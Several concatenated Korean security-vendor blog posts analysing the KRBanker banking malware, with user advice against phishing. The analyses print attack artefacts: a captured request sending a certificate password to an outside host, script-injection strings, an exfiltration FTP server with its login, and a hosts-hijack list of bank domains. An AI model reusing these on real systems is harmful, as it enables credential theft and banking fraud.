1. 공인인증서 유출로 인한 피해 주의


잉카인터넷 대응팀은 2013년 02월 01일 해외의 특정 FTP 서버로 국내 이용자들의 공인인증서(NPKI)파일이 다량으로 유출된 정황을 포착하였다. 해당 악성파일(KRBanker)은 국내 IP주소로 할당되어 있는 곳에서 유포되었는데, 도메인은 2013년 1월 21일 중국인으로 추정되는 명의로 생성된 곳이다. 또한, 악성파일은 2013년 01월 25일 잉카인터넷 대응팀을 통해서 공개된 바 있는KRBanker 변종형태로 실제 공인인증서 창의 클래스명(QWidget)을 감시하고 있다가 공인인증서가 활성화되면 조작된 가짜 입력화면을 교묘히 겹쳐서 입력되는 비밀번호를 탈취하게 된다.

기존의 정상적인 전자서명 화면을 이용하고 있다는 점에서 각별한 주의가 필요하다. 특히, 전자금융사기 사이버 범죄자들이 운영하는 FTP 서버에 다수의 공인인증서가 탈취된 내역이 공식적으로 확인된 상태이기 때문에 그 심각성이 사실로 입증되었고, 유출된 공인인증서(NPKI) 파일들이 또 다른 범죄에 악용될 소지도 충분히 있을 수 있으므로, 금융보안 강화에 그 어느 때보다 많은 관심을 가져야 할 시기이다. 더불어 이용자들은 보안카드의 전체 비밀번호를 컴퓨터에 보관해 두지 않도록 하며, 인터넷 상에서 보안카드의 모든 비밀번호를 입력하도록 요구하는 경우 100% 금융 피싱(파밍)이라는 점을 명심해야 한다.

■ 유사 변종 정보
[주의]실제 공인인증서 서비스에서 암호 탈취를 시도하는 악성파일
http://erteam.nprotect.com/383
 
2. 악성파일의 상세 기능 및 공인인증서 탈취 과정

해당 악성파일(KRBanker)은 웹 사이트의 보안취약점을 통해서 전파되는 수법을 이용하고 있어, 보안이 취약한 이용자가 해킹되어 변조된 특정 웹 사이트의 접속만으로 악성파일에 감염되게 되고, 이용자는 자신이 언제 악성파일에 감염되었는지 인지하지 못하는 경우가 일반적이다.

악성파일에 감염이 이루어지면, 윈도우(Windows) 하위폴더에 "hanhelp" 이름의 폴더를 생성하고, 특정 웹 사이트로 접속하여 추가 악성파일을 다운로드한다.

hxxp://www.ki****tel.com/web/down/LoginMgr.dll
hxxp://www.ki****tel.com/web/down/kbs.exe
hxxp://www.ki****tel.com/web/down/NDeleteAll.exe
hxxp://www.ki****tel.com/web/down/ftp.exe

악성파일 유포에 사용된 도메인은 중국인 추정의 명의로 등록되어 있다.


각각의 파일은 서버에서 컴퓨터에 다운로드될 때 파일명 앞부분에 ps 라는 접두어가 추가되어 생성된다.


"psLoginMgr.dll" 파일은 웹 도우미 객체(BHO:Browser Helper Objects)에 등록시켜, 웹 브라우저(Internet Explorer)가 동작시 자동으로 실행되도록 만들며, 아래와 같이 다양한 기능을 수행한다.

- 특정 금융사이트 도메인 접속시 윈도우 방화벽 서비스를 중지하고, 감염된 컴퓨터의 MAC 주소 등을 외부로 유출 시도한다. 또한, 조건에 따라 모든 악성파일을 스스로 삭제하는 기능의 "psDeleteAll.exe" 파일을 실행한다.

 - "psDeleteAll.exe" 명령 수행조건이 아니면, [GetWindowsDirectoryA] API 함수를 통해서 윈도우 경로를 구하고, [WinExec] 명령을 통해서 "hanhelp" 폴더에 포함된 "pskbs.exe" 악성파일을 실행하도록 한다.


- 사용자의 MAC 주소를 체크하고, Internet Explorer 버전을 확인한다.


- Internet Explorer 버전을 확인 후에 특정 웹 사이트로 접근하여 버전에 따라 "kbstar_IE6.js", "kbstar_IE8.js" 스크립트 파일을 실제 금융사이트의 Body 부분에 삽입하게 된다.

10020C00  page=C018393&strGuidViewFlag=Y&USER_ID_KEY=SECURITY_ID_KEY&RESCODE=111&page=C018393  68000C0210
1000684d  PUSH 10020C54  &va1lue=Az01  68540C0210
100068ce  PUSH 10020C68  &nbsp <script defer src='http://www.ucim***.com/web/ordercard/kbstar_IE6.js'></script>  68680C0210
100068f2  PUSH 10020CC0  &nbsp <script defer src='http://www.ucim***.com/web/ordercard/kbstar_IE8.js'></script>  68C00C0210
10006925  PUSH 10020D18  afterBegin  68180D0210

자바스크립트 파일 내부에는 인터넷 뱅킹용 보안카드 비밀번호를 입력하도록 유도하고, 탈취시도하는 코드들이 포함되어 있다.


- "pskbs.exe" 파일이 실행되면 "psftp.exe" 파일을 보이지 않도록[SW=HIDE] 실행하기 때문에 실제 화면에는 보이지 않는다.

- "pskbs.exe" 파일은 이용자가 특정 금융사이트 접속시 공인인증서 화면이 나오는지 감시하기 위해서 전자 서명창의 클래스명인 "QWidget" 이름을 비교하고, [GetWindowTextW] 함수로 만들어진 가짜 입력 폼에 입력되는 공인인증서 암호 등의 탈취를 시도한다.

- "psftp.exe" 파일이 실행되면 사용자의 하드디스크의 드라이브를 순차적으로 검색하고, 공인인증서(NPKI) 존재여부를 조회한다.


- 공인인증서(NPKI) 파일이 검색되면 FTP 서버(174.139.67.234)로 접속하여 감염된 컴퓨터의 MAC 주소 이름으로 서버에 폴더를 생성하고, 공인인증서를 업로드한다.


이러한 과정을 통해서 유출되는 공인인증서(NPKI)들은 미국소재의 [174.139.67.234] IP주소의 FTP로 전송이 되며, 내부에는 실제로 다음과 같이 다수의 공인인증서 파일이 유출된 내역을 볼 수 있다.

이중 FTP 서버에 공인인증서 파일이 등록된 시간기준으로 2013년 01월 31일 오전 07시 56분과 08시 02분에 등록된 공인인증서는 중국인 명의로 추정되는 사용자 파일이 업로드되어 있다.



해당 공인인증서는 2012년 09월 29일 발급되었고, 2013년 10월 27일 만료 예정이다.


그런데 이 공인인증서는 MAC 주소가 VMWare 프로그램상에서 초기값(00:0c:29:**:**:**)으로 사용되는 코드를 사용하고 있어, 실제 악성파일 유포 조직들이 탈취 테스트를 수행한 것으로 의심되고 있다.


또한, 특정 하위 폴더에는 한글로 "새 폴더"가 생성되어 있었고, "down.rar" 압축파일에는 또 다른 변종도 등록되어 있었다.



3. 피싱 사이트 진위 여부 판단법

내가 접속한 곳이 실제 정상적인 금융사이트인지, 아니면 모방 사칭된 금융 피싱사이트인지 판가름하기 어려울 정도로 최근의 피싱사이트들은 매우 정교화되고 디자인도 한글을 포함해서 다양한 방식으로 고급화되고 있는 추세이다. 여기서 이용자들이 무엇보다 주목해야 할 부분은 바로 사이버 범죄자들이 노리는 공통점이 무엇일까라는 점이다. 그들은 사용자들의 개인 금융정보 탈취를 통해서 예금을 불법 인출하기 위한 목적을 가지고 있다는 것이다.

따라서 과도하게 금융정보를 요구하는 웹 사이트가 있다거나 그동안 여러차례 강조했던 것처럼 절대 공개되어서는 안되는 보안카드의 전체 비밀번호를 동시에 요구하는 경우는 모두 피싱사이트라는 점을 기억하고 있다면 유사한 금융 보안위협을 능동적으로 대처할 수 있게 된다.


 

2013년은 전자금융사기용 악성파일(KRBanker) 변종이 더욱 더 기승을 부릴 전망이며, 기술적으로도 진화를 거듭할 것으로 예상되는 만큼, 인터넷 뱅킹 이용자들은 보안카드의 번호를 직접 입력하거나 외부에 노출되지 않도록 각별한 주의를 기울여야 할 것으로 보인다.

해당 악성 파일은 대부분의 국내 금융권 사이트를 피싱 대상으로 삼고 있으며, 감염 후 인터넷 뱅킹 사이트에 접속 시 대부분의 은행 사이트와 매우 유사하게 제작된 사이트를 사용자들에게 보여주기 때문에 일반 사용자들의 경우 감염 여부를 육안상으로 손쉽게 식별해 내기는 어려울 수 있다. 때문에 이러한 악성 파일로 부터 안전한 PC 사용 및 금융권 사이트 이용을 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 주의를 기울이는 것이 무엇보다 중요하다고 할 수 있겠다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 위와 같은 악성파일을 포함한 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

nProtect Anti-Virus/Spyware v3.0 제품에서는 다양한 변종 악성파일을 진단/치료하고 있다.

▣ AVS 3.0 무료 설치 : http://avs.nprotect.com/

 

저작자 표시
신고
Posted by nProtect
1. 공인인증서 암호를 직접 겨냥한 KRBanker 변종 등장


국내 인터넷 뱅킹용 이용자들을 노린 악성파일(KRBanker) 변종이 거의 매일 새롭게 발견되고 있는 가운데, 최근 기존과 다른 형태의 악성파일 유형이 발견되었다. 지금까지 발견된 다양한 형태 중 대다수는 호스트파일(hosts)의 내용을 변경하여 정상적인 금융사이트 주소로 접속을 하더라도 피싱사이트로 연결되도록 조작하는 방식이 주로 이용되고 있다. 그외에 호스트파일(hosts)을 변경하지 않고 악성파일이 사용자의 인터넷 접속 사이트를 모니터링하다가 특정 금융사이트 주소에 접근시 피싱사이트로 웹 페이지를 교묘하게 바꿔치기 하는 수법 등이 존재한다. 이러한 방식은 모두 공통적으로 가짜로 만들어진 공인인증서 전자서명 로그인 화면을 보여주어 사용자가 입력하는 공인인증서 암호를 손쉽게 탈취할 수 있도록 만들어져 있다. 하지만 최근에 발견된 악성파일은 실제 공인인증서 화면에 가짜 폼을 교묘히 덮어씌어 입력되는 암호 자체를 탈취하기 시작했다.

이처럼 전자금융사기용 악성파일이 다각적인 방식을 도입하는 등 꾸준히 지능화되고 있다는 점을 명심하고, 전자금융서비스 이용자들 스스로 금융보안위협에 노출되지 않도록 각별히 주의해야 한다. 특히, 그 무엇보다 어떠한 경우라도 인터넷 뱅킹용 보안카드의 전체번호 모두를 동시에 입력하지 않도록 유념해야 한다.



[주의]OTP 이벤트로 위장한 전자금융사기용 악성파일(KRBanker)
http://erteam.nprotect.com/381

[주의]안랩 프로그램 사칭 인터넷 뱅킹용 악성파일
http://erteam.nprotect.com/380

[주의]금융 보안프로그램으로 둔갑한 악성파일 출현
http://erteam.nprotect.com/379

[주의]국내 스마트 뱅킹 이용자를 노린 피싱용 안드로이드 악성앱 등장
http://erteam.nprotect.com/378

[칼럼]특명! 사이버 은행강도로부터 당신의 금융자산을 보호하라.
http://erteam.nprotect.com/374

[주의]금융자산예방서비스 사칭! 믿는도끼에 발등 찍힌다.
http://erteam.nprotect.com/373

[주의]무료 동영상에 숨겨진 검은 그림자, 당신의 예금을 노린다.
http://erteam.nprotect.com/371

[위험]전자금융사기용 악성파일(KRBanker) 시스템 파괴 기능 탑재
http://erteam.nprotect.com/370

[긴급]KRBanker 새로운 변종 애플 아이콘으로 위장!
http://erteam.nprotect.com/366

[주의]KRBanker 변종 시티은행 피싱 목록 추가!
http://erteam.nprotect.com/365

[긴급]KRBanker 전자금융사기용 허위 예방 서비스로 사용자 유혹
http://erteam.nprotect.com/347

[정보]보안승급 사칭 전자금융사기 기승, 사이버 금융범죄와의 전쟁
http://erteam.nprotect.com/344

[칼럼]국내 인터넷 뱅킹 보안위협 절대 남의 일이 아니다!
http://erteam.nprotect.com/341

[주의]국내 인터넷 뱅킹용 악성파일 BHO 기능 겨냥
http://erteam.nprotect.com/340

[주의]인터넷 뱅킹 보안강화(승급) 서비스는 전자금융사기의 덫
http://erteam.nprotect.com/339

[긴급]국내 인터넷뱅킹 사용자를 노린 악성파일 급속 유포
http://erteam.nprotect.com/293

[주의]국내 인터넷 뱅킹 보안승급서비스 사칭한 스마트폰 문자피싱
http://erteam.nprotect.com/258


2. 악성파일 정보

이번에 발견된 악성파일(KRBanker)은 국내 특정 웹 사이트가 불법 변조되어, JAVA 보안취약점을 보유하고 있는 사용자가 사이트에 접속하는 것만으로 악성파일에 자동적으로 감염되도록 만들어져 있었다.


보안취약점에 노출되어 Dropper 기능의 1차 악성파일("RunIeHelpG.exe")에 감염되면, 윈도우즈(Windows) 하위 폴더에 "handownbak" 이름의 폴더가 생성되고, 내부에 "kbs.exe", "ftp.exe", "LoginMgr.dll", "DeleteAll.exe", "config.ini" 등의 악성파일이 추가로 생성되고 실행된다.


"kbs.exe" 파일은 한국어 프로그램 언어로 제작되어 있고, 원본파일명은 한국(han)과 은행(bank)을 의미하는 것으로 추정되는 "hanbank.exe" 이다.


사용자가 웹 브라우저를 이용해서 특정 인터넷 뱅킹 사이트에 접속을 시도하면 다음과 같이 "kbs.exe", "ftp.exe" 등이 실행되며, 사용자의 공인인증서(NPKI) 탈취시도와 함께 감염된 컴퓨터의 MAC주소, 공인인증서(NPKI) 로그인 암호 탈취 등이 시도된다.


"ftp.exe" 파일의 경우 110.34.233.146 주소의 FTP 주소로 로그인(a123/a123)하여 공인인증서(NPKI) 파일을 전송시도한다.


감염된 사용자가 실제 공인인증서 화면에서 로그인을 시도하게 되면 다음과 같이 MAC주소와 공인인증서 암호 등이 외부로 탈취시도된다. 아래 화면은 실제 공인인증서를 이용해서 테스트를 수행한 화면이며, 테스트에 사용된 "npki_pass_test" 값의 암호가 외부로 전송 시도되는 것을 확인해 볼 수 있다.


GET /web/ups/in.asp?mac=00-03-FF-08-B4-43&servname=kbstar.com&bankpass=&password=npki_pass_test HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host:
www.colorephone.com
Connection: Keep-Alive

앞서 설명한 바와 같이 공인인증서와 암호 탈취를 시도하는 과정에서 실제 금융권에서 서비스 중인 키보드보안 프로그램이 악성파일의 동작을 감지하여 다음과 같은 안내창을 띄우고, 강제로 웹페이지 접속을 차단하여, 실제 테스트에서는 공인인증서 다음 화면으로 이동하지는 못하였다.


악성파일 제작자들은 다양한 기법을 이용해서 전자금융사기용 악성파일(KRBanker)을 꾸준히 제작하고 있고, 거의 매일 새롭게 변종이 양산되어 유포 중이다. 아울러 피싱사이트 뿐만 아니라 실제 금융사이트의 정보를 직접 겨냥하여 탈취도 시도하고 있다는 점을 간과해서는 안될 것이다.

금일 오전에도 다양한 피싱사이트가 발견되었고, 피싱사이트의 메인 화면에는 아래와 같이 실제 존재하지 않는 팝업 화면을 출력하여 이용자들로 하여금 금융정보를 입력하도록 유혹하고 있다. 해당 피싱사이트는 한국인터넷진흥원(KISA) 종합상황실에 긴급으로 차단을 요청한 상태이다.


피싱사이트는 대부분 아래와 같이 평소와 다르게 금융정보를 과도하게 입력하도록 유도하며, 특히 보안카드의 모든 비밀번호를 입력하도록 하는 것이 특징이다. 국내의 어떠한 금융권도 보안카드의 모든 비밀번호를 동시에 요구하는 경우는 없다는 점을 명심한다면 유사한 보안위협을 효과적으로 예방할 수 있다.


3. 피싱 사이트 진위여부 판단 노하우


내가 접속한 곳이 실제 정상적인 금융사이트인지, 아니면 모방 사칭된 금융 피싱사이트인지 판가름하기 어려울 정도로 최근의 피싱사이트들은 매우 정교화되고 디자인도 한글을 포함해서 다양한 방식으로 고급화되고 있는 추세이다. 여기서 이용자들이 무엇보다 주목해야 할 부분은 바로 사이버 범죄자들이 노리는 공통점이 무엇일까라는 점이다. 그들은 사용자들의 개인 금융정보 탈취를 통해서 예금을 불법 인출하기 위한 목적을 가지고 있다는 것이다.

따라서 과도하게 금융정보를 요구하는 웹 사이트가 있다거나 그동안 여러차례 강조했던 것처럼 절대 공개되어서는 안되는 보안카드의 전체 비밀번호를 동시에 요구하는 경우는 모두 피싱사이트라는 점을 기억하고 있다면 유사한 금융 보안위협을 능동적으로 대처할 수 있게 된다.


2013년은 전자금융사기용 악성파일(KRBanker) 변종이 더욱 더 기승을 부릴 전망이며, 기술적으로도 진화를 거듭할 것으로 예상되는 만큼, 인터넷 뱅킹 이용자들은 보안카드의 번호를 직접 입력하거나 외부에 노출되지 않도록 각별한 주의를 기울여야 할 것으로 보인다.

해당 악성 파일은 대부분의 국내 금융권 사이트를 피싱 대상으로 삼고 있으며, 감염 후 인터넷 뱅킹 사이트에 접속 시 대부분의 은행 사이트와 매우 유사하게 제작된 사이트를 사용자들에게 보여주기 때문에 일반 사용자들의 경우 감염 여부를 육안상으로 손쉽게 식별해 내기는 어려울 수 있다. 때문에 이러한 악성 파일로 부터 안전한 PC 사용 및 금융권 사이트 이용을 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 주의를 기울이는 것이 무엇보다 중요하다고 할 수 있겠다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 위와 같은 악성파일을 포함한 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

nProtect Anti-Virus/Spyware v3.0 제품에서는 다양한 변종 악성파일을 진단/치료하고 있다.

▣ AVS 3.0 무료 설치 : http://avs.nprotect.com/


저작자 표시
신고
Posted by nProtect
1. 보안관련 인증절차와 금융 보안프로그램으로 사칭한 KRBanker


잉카인터넷 대응팀은 국내 인터넷 뱅킹 이용자들의 예금탈취를 노린 악성파일(KRBanker) 변종이 새로운 형태의 내용으로 전자금융 서비스 이용자들을 현혹시키고 있는 정황을 포착하였다. 악성파일은 국내 특정 웹 사이트를 해킹하여 보안이 취약한 접속자로 하여금 웹 사이트 접속만으로 악성파일(KRBanker)에 은밀히 감염되도록 만들어 두었다. 악성파일에 노출되어 감염이 이뤄지면, 사용자 컴퓨터에 존재하는 호스트파일(hosts)을 변조하여 시티은행, 하나은행, 기업은행, 국민은행, 외환은행, 농협, 신한은행, 수협, 스탠다드차타드, 우리은행 등의 도메인 접속 주소를 특정 피싱 IP주소로 몰래 변경시킨다. 이로인해 사용자가 정상적인 금융사 홈페이지를 접속하더라도 피싱 IP주소로 연결되어 정교하게 조작된 가짜 금융사이트 화면보이게 된다.

특히, 이번에 발견된 사례는 전자금융사기가 기승을 부리고 있다는 점을 역이용해서 마치 정상적인 금융 보안관련 인증절차 진행인 것처럼 사칭한 문구와 금융 보안 프로그램 설치 내용으로 이용자의 정보탈취를 유도하고 있어 세심한 주의가 요구된다.



[주의]국내 스마트 뱅킹 이용자를 노린 피싱용 안드로이드 악성앱 등장
http://erteam.nprotect.com/378

[칼럼]특명! 사이버 은행강도로부터 당신의 금융자산을 보호하라.
http://erteam.nprotect.com/374

[주의]금융자산예방서비스 사칭! 믿는도끼에 발등 찍힌다.
http://erteam.nprotect.com/373

[주의]무료 동영상에 숨겨진 검은 그림자, 당신의 예금을 노린다.
http://erteam.nprotect.com/371

[위험]전자금융사기용 악성파일(KRBanker) 시스템 파괴 기능 탑재
http://erteam.nprotect.com/370

[긴급]KRBanker 새로운 변종 애플 아이콘으로 위장!
http://erteam.nprotect.com/366

[주의]KRBanker 변종 시티은행 피싱 목록 추가!
http://erteam.nprotect.com/365

[긴급]KRBanker 전자금융사기용 허위 예방 서비스로 사용자 유혹
http://erteam.nprotect.com/347

[정보]보안승급 사칭 전자금융사기 기승, 사이버 금융범죄와의 전쟁
http://erteam.nprotect.com/344

[칼럼]국내 인터넷 뱅킹 보안위협 절대 남의 일이 아니다!
http://erteam.nprotect.com/341

[주의]국내 인터넷 뱅킹용 악성파일 BHO 기능 겨냥
http://erteam.nprotect.com/340

[주의]인터넷 뱅킹 보안강화(승급) 서비스는 전자금융사기의 덫
http://erteam.nprotect.com/339

[긴급]국내 인터넷뱅킹 사용자를 노린 악성파일 급속 유포
http://erteam.nprotect.com/293

2. 악성파일 전파 경로 및 분석 정보

국내 특정 웹 사이트가 해킹되어 악의적인 스크립트가 삽입되었으며, 이용자가 악성 스크립트와 연결된 사이트에 접속할 경우 보안취약점(CVE-2012-1723) 공격을 받게 된다. 만약 이용자 컴퓨터가 보안에 취약한 경우 전자금융사기용 악성파일(KRBanker)에 자동으로 감염이 된다.

다음 화면은 보안 취약점 공격에 이용된 악성 스크립트의 일부 화면이다.


보안취약점에 의해서 악성 스크립트가 정상적으로 작동되면 특정 웹 사이트에서 악성파일(KRBanker)이 사용자 임시폴더(Temp)에 "updata.exe" 이름의 파일명으로 다운로드되고 실행된다.


악성파일(KRBanker)이 실행되면 사용자의 호스트파일(hosts)을 변조하기 위해서 임시폴더에 "1.bat" 파일을 생성하여 실행한다. 해당 배치파일에는 특정 IP주소로 은행사이트가 연결되도록 하는 명령어를 포함하고 있다.

여기서 문제는 악성파일이 공격자의 명령(C&C)에 따라서 피싱용 IP주소를 실시간으로 변경하고 있기 때문에 감염되는 사용자들은 동일한 악성파일에 감염되더라도 시점에 따라 다른 IP주소가 설정되고 있다.
 


"1.bat" 파일의 배치명령에 의해서 호스트파일(hosts)의 내용은 아래와 같이 피싱 사이트 내용으로 변경된다. 이 때문에 이용자가 정상적인 금융권 웹 사이트 도메인으로 직접 접속하더라도 가짜 피싱 사이트가 있는 IP주소(67.229.68.158)로 강제 연결되며, 웹 브라우저상에는 실제 정상적인 금융권 도메인 주소로 보여지기 때문에 이용자가 정상 금융사이트로 착각할 가능성이 높다.

CITIBANK.CO.KR   :: 시티은행
WWW.CITIBANK.CO.KR  :: 시티은행
HANABANK.COM   :: 하나은행
WWW.HANABANK.COM   :: 하나은행
WWW.IBK.CO.KR   :: 기업은행
MYBANK.IBK.CO.KR   :: 기업은행
KIUP.IBK.CO.KR   :: 기업은행
KBSTAR.COM   :: 국민은행
WWW.KBSTAR.COM   :: 국민은행
OBANK.KBSTAR.COM   :: 국민은행
KEB.CO.KR    :: 외환은행
WWW.KEB.CO.KR   :: 외환은행
BANK.KEB.CO.KR   :: 외환은행
EBANK.KEB.CO.KR   :: 외환은행
NONGHYUP.COM   :: 농협
WWW.NONGHYUP.COM   :: 농협
BANKING.NONGHYUP.COM  :: 농협
SHINHAN.COM   :: 신한은행
WWW.SHINHAN.COM   :: 신한은행
BANKING.SHINHAN.COM  :: 신한은행
WWW.SUHYUP-BANK.COM  :: 수협은행
WWW.STANDARDchartered.CO.kr :: 스탠다드차타드은행
WOORIBANK.COM   :: 우리은행
WWW.WOORIBANK.COM   :: 우리은행
PIB.WOORIANK.COM   :: 우리은행
SPD.WOORIBANK.COM   :: 우리은행


호스트파일(hosts)이 변조된 상태에서 대상 금융사이트에 접속할 경우 피싱 IP주소(67.229.68.158)로 변경 접속된다. 피싱용 IP주소는 계속 실시간으로 변경되고 있다. 동일한 악성파일에 감염되더라도 공격자의 명령에 따라 IP주소는 다르게 적용되고 있기 때문에 알려지지 않은 피싱용 IP주소가 매우 많이 존재할 것으로 보인다.

현재까지 잉카인터넷 대응팀이 파악한 가변적 피싱 IP주소는 다음과 같고, 시간에 따라 계속 변경되고 있다.

- 67.229.68.158
- 67.229.68.237
- 67.229.68.238
- 174.139.174.254

악성파일(KRBanker)에 감염된 상태에서 한 예로 국민은행 사이트에 접속할 경우 다음과 같이 정교하게 제작된 피싱 사이트로 연결이 이뤄지고, 실제로는 존재하지 않는 가짜 팝업 메시지 창이 출력된다. 가짜 메시지 창은 마치 정상적인 보안서비스 처럼 보여지지만, 모두 허위로 조작된 내용이다.

기존에는 보안승급서비스, 보안강화서비스, 전자금융사기예방서비스 등으로 위장한 형태가 보고되었으나, 이번에는 "보안관련 인증절차"라는 문구로 사용자들을 현혹하고 있다.

 




상기 화면에서 이용자가 [확인]버튼을 클릭하게 되면 금융 개인정보를 입력하도록 유도하는 피싱화면으로 넘어가게 되며, 사용자 추가본인 확인절차라는 화면으로 과도하게 금융정보를 요구하고, 전자금융사기 수법의 공통점인 보안카드의 모든 비밀번호를 입력하도록 유도한다.

 


만약 이용자가 피싱화면에 속아 보안카드의 비밀번호까지 모두 입력하게 될 경우 금융정보가 외부로 유출되어 예기치 못한 전자금융사기 피해를 입을 수 있게 된다. 이어서 피싱 웹 사이트에는 보안프로그램 설치라는 조작된 화면을 보여주면서 이용자에게 추가적인 악성파일을 설치하도록 시도한다.



분석당시에는 정상적으로 악성파일이 서버에 존재하지 않아 상세확인의 진행은 불가능했으나, 추가 악성파일(KRBanker/Backdoor)을 설치하여 공인인증서 탈취를 시도했을 것으로 추정된다.

보안프로그램처럼 모방하여 추가 악성파일을 설치시도하는 형태까지 진화하고 있으므로, 이용자들은 유사 피싱화면에 현혹되지 않도록 각별한 주의가 필요하다.

3. 피싱 사이트 진위여부 판단 노하우


내가 접속한 곳이 실제 정상적인 금융사이트인지, 아니면 모방 사칭된 금융 피싱사이트인지 육안상으로 진위여부를 판가름하기 어려울 정도로 최근의 피싱사이트들은 매우 정교화되고 디자인도 한글을 포함해서 다양한 방식으로 고급화되고 있는 추세이다. 여기서 이용자들이 무엇보다 주목해야 할 부분은 바로 사이버 범죄자들이 노리는 공통점이 무엇일까라는 점이다. 그들은 사용자들의 개인 금융정보 탈취를 통해서 예금을 불법 인출하기 위한 목적을 가지고 있다는 것이다.

따라서 과도하게 금융정보를 요구하는 웹 사이트가 있다거나 그동안 여러차례 강조했던 것처럼 절대 공개되어서는 안되는 보안카드의 전체 비밀번호를 동시에 요구하는 경우는 모두 피싱사이트라는 점을 기억하고 있다면 유사한 금융 보안위협을 능동적으로 대처할 수 있게 된다.


2013년은 전자금융사기용 악성파일(KRBanker) 변종이 더욱 더 기승을 부릴 전망이며, 기술적으로도 진화를 거듭할 것으로 예상되는 만큼, 인터넷 뱅킹 이용자들은 보안카드의 번호를 직접 입력하거나 외부에 노출되지 않도록 각별한 주의를 기울여야 할 것으로 보인다.

해당 악성 파일은 대부분의 국내 금융권 사이트를 피싱 대상으로 삼고 있으며, 감염 후 인터넷 뱅킹 사이트에 접속 시 대부분의 은행 사이트와 매우 유사하게 제작된 사이트를 사용자들에게 보여주기 때문에 일반 사용자들의 경우 감염 여부를 육안상으로 손쉽게 식별해 내기는 어려울 수 있다. 때문에 이러한 악성 파일로 부터 안전한 PC 사용 및 금융권 사이트 이용을 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 주의를 기울이는 것이 무엇보다 중요하다고 할 수 있겠다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 위와 같은 악성파일을 포함한 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

nProtect Anti-Virus/Spyware v3.0 제품에서는 다양한 변종 악성파일을 진단/치료하고 있다.

▣ AVS 3.0 무료 설치 : http://avs.nprotect.com/


저작자 표시
신고
Posted by nProtect
1. 전자금융사기용 KRBanker 2번 사기를 친다.

 

잉카인터넷 대응팀은 국내 인터넷 뱅킹용 악성파일(KRBanker) 변종이 새로운 형태로 진화되고 있는 이상징후를 포착하였다. 2012년 6월 초 부터 변종별로 시리즈가 꾸준히 발견되고 있는 국내 전자금융사기용 악성파일(KRBanker)은 초기 호스트파일(hosts)을 이용하는 방식이 유행한 바 있고, 다음으로 호스트파일을 사용하지 않고 독립적으로 활동하는 방식이 발견된 바 있다. 최근에는 피싱사이트 차단 시간이 짧아지고, 악성파일의 생존시간을 최대화하기 위해서 C&C 서버를 통한 신규 피싱사이트로 자동업데이트 하는 방법 등의 새로운 기술과 결합하여 사용되고 있었다. 그러나 2012년 10월 18일에 발견된 형태는 인터넷 뱅킹을 접속하지 않아도 가짜 메시지 안내창을 출력하여 사용자에게 즉시 인터넷 뱅킹 사이트로 접속하도록 유도하고 있다.

[참고]잉카인터넷 nProtect Anti-Virus 제품군에서는 국내 인터넷 뱅킹용 악성파일 변종들에 대해서 "KRBanker" 이름을 대표 탐지명으로 사용하고 있다. 악성파일 진단명은 우리나라(Korea)와 인터넷 뱅킹용 악성파일(Banker)의 의미를 합성한 용어이다.

Korea + Banker = KRBanker


이는 KRBanker 악성파일이 사용하는 피싱 도메인이 신속하게 차단되자, 공격자들은 악성파일에 감염된 사용자가 피싱사이트가 발각되어 차단되기 이전 시점에 사용자들이 즉시 피싱사이트로 접속하도록 미끼를 사용하는 방식으로 진화했다고 분석할 수 있다.

2. 가짜 메시지 창을 출력하는 악성파일(KRBanker) 변종 등장

[정보]보안승급 사칭 전자금융사기 기승, 사이버 금융범죄와의 전쟁
http://erteam.nprotect.com/344

[칼럼]국내 인터넷 뱅킹 보안위협 절대 남의 일이 아니다!
http://erteam.nprotect.com/341

[주의]국내 인터넷 뱅킹용 악성파일 BHO 기능 겨냥
http://erteam.nprotect.com/340

[주의]인터넷 뱅킹 보안강화(승급) 서비스는 전자금융사기의 덫
http://erteam.nprotect.com/339


이번에 발견된 국내 인터넷 뱅킹용 악성파일(KRBanker) 변종은 한국어 언어용 델파이 프로그램으로 개발되었고, "bbb.exe" 라는 메인 숙주에 의해서 다양하게 설치되는 형태를 가지고 있다.


"bbb.exe" 파일 내부에는 "ad.exe", "Sad.exe" 라는 파일이 포함되어 있다. "ad.exe" 파일도 SFX RAR 파일 형태로 내부에  "Demos.exe", "MyKB.exe" 파일 등이 포함되어 있다.


"ad.exe" 파일 내부에는 KRBanker 변종과 가짜 공인인증서에 사용되는 이미지 등이 포함되어 있다.

 
"1.bmp" 부터 "9.bmp" 파일은 아래과 같고, 각 금융권에서 사용하는 공인인증서 이미지이다.

 


